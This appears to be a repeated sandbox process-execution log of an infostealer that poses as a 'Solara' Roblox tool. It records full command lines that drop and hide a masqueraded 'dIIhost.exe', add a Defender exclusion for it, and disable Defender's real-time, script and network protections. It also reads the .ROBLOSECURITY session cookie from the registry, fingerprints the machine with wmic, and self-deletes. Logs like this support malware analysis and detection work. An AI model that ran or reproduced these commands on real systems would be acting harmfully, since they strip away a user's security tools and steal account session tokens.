C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Conhost.exe
